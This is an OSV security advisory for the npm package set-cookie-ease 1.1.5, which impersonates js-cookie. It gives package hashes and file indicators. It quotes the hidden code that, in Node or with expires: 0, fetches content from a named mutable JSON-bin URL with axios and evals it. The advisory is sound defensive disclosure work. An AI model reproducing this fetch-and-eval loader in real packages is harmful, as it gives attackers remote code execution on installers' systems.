MAL-2026-6500

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/set-cookie-ease/MAL-2026-6500.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6500
Published
2026-06-26T02:18:30Z
Modified
2026-06-26T03:31:24.739047865Z
Summary
Malicious code in set-cookie-ease (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (b2bf656ba38b4d951239ee29799f510de4a8cb93fcf5d8005db4cd679a8631e6)

Package masquerades as js-cookie (same banner /*! js-cookie v3.0.5 | MIT */, README, and repository.url: git://github.com/js-cookie/js-cookie.git) but diverges in dist/cookie.ease.js. At lines 46-49, the Cookies.set implementation contains if (typeof document === 'undefined' || attributes.expires == 0) { require('axios').get(atob('...')).then(r => { eval(r.data.content) }); return }. The base64 string decodes to https://www.jsonkeeper.com/b/VKUNI, a public mutable JSON-bin where the maintainer can swap the payload at any time. The branch fires whenever document is undefined (any Node/SSR consumer — Next.js, Nuxt, Remix, etc.) or when a caller passes expires: 0, executing arbitrary attacker-controlled JavaScript inside the consumer's Node process with full host privileges. To support this, package.json adds axios and request as dependencies despite the README advertising 'No dependency'. This satisfies the typosquat-with-malicious-payload class: installer harm is concrete (RCE on first Cookies.set call in Node) and the destination is attacker-mutable.

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "1.1.5"
            ],
            "modified_time": "2026-06-26T02:18:30Z",
            "sha256": "b2bf656ba38b4d951239ee29799f510de4a8cb93fcf5d8005db4cd679a8631e6",
            "id": "IN-MAL-2026-007581",
            "source": "amazon-inspector",
            "import_time": "2026-06-26T03:14:43.424094543Z"
        }
    ]
}
References
Credits

Affected packages

npm / set-cookie-ease

Package: npm / set-cookie-ease
Affected ranges: 1.*
Affected versions: 1.1.5

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/set-cookie-ease/MAL-2026-6500.json"
indicators
{
    "package_integrity": [
        {
            "filename": "set-cookie-ease-1.1.5.tgz",
            "hashes": {
                "sha512_sri": "sha512-Tq+kA4M9dTWGV2lVharZMCMEPHmGIrBtexa9GA0nQhtz19yD5u39QOJjiSNxXej3REc8ybooC9HdPhtK5KEOxA==",
                "sha1": "c8ad5bbfba3c521bb5aadbb94070b790d74bd8b6"
            }
        }
    ],
    "evidence_files": [
        {
            "path": "dist/cookie.ease.js",
            "tlsh": "2a91026c28e625e21f072039dbaf65007274d51b049ede60bc8ce3621f6ac3916f5aed",
            "sha256": "540960191cc1f421c1c9fa10e2d77034785ecfc0b5b86fae9355a919fcb26d01"
        },
        {
            "path": "package.json",
            "tlsh": "a741db2cec1c4ea70ae81ae9295a1282b52094035d40fc4d7362272c4f5e55f31ff7bd",
            "sha256": "189969a958cb206853853d515f1e367e5c9d6dd985fea423501913776b81f8da"
        }
    ]
}